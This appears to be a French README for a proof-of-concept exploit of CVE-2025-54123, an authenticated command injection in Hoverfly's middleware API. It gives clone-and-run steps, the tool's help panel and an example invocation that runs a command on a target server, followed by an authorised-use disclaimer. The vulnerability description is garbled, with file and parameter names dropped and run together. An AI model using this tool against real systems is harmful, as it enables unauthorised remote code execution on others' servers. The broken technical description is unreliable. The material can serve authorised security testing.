
Exploit de preuve de concept pour CVE-2025-54123, une injection de commande authentifiée critique dans Hoverfly <= 1.11.3, permettant une exécution de code à distance via le point de terminaison de l'API middleware.
PoC CVE-2025-54123 - Injection de commande Middleware dans Hoverfly
Cette vulnérabilité affecte les versions de Hoverfly ≤ 1.11.3 et cible spécifiquement le point de terminaison /api/v2/hoverfly/middleware. Elle est causée par une validation et un assainissement insuffisants des entrées dans plusieurs fichiers, notamment middleware.go, local_middleware.go et . L'entrée contrôlée par l'utilisateur fournie au paramètre est passée directement à un binaire système (par exemple ) sans vérifications appropriées, permettant avec les privilèges du processus Hoverfly.
hoverfly_service.goscript/bin/bashcurlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - Authenticated Middleware Command Injection
[?] Parameters description:
-t Target base URL (e.g., http://target:8888)
-u Valid username
-p Valid password
-c Command to execute (must be enclosed in double quotes)
-h Show this help panel
[i] Example:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
Cet exploit est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
Ne PAS utiliser cela contre des systèmes sans autorisation explicite. L'accès non autorisé peut être illégal.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de tout dommage causé.